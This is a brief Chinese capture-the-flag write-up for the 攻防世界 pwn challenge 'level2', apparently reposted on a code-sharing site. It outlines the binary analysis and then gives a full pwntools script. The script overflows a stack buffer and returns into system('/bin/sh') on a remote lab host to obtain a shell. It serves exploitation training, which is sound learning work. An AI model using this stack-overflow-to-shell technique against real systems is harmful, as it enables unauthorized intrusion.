攻防世界—pwn—level2


題目分析

題目提示

下載文件后首先使用checksec檢查文件保護機制

使用ida打開,查看偽代碼


搜索字符串發現/bash/sh

信息收集

偏移量

system的地址

/bin/sh的地址

編寫腳本

from pwn import *
p = remote('111.198.29.45',50136)
#p = process("./pwn003")
binsh = 0x0804A024
system = 0x8048320
payload = "A"*0x88+"B"*0x4+p32(system)+p32(0)+p32(binsh)
p.sendline(payload)
p.interactive()

本地測試

靶機測試


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM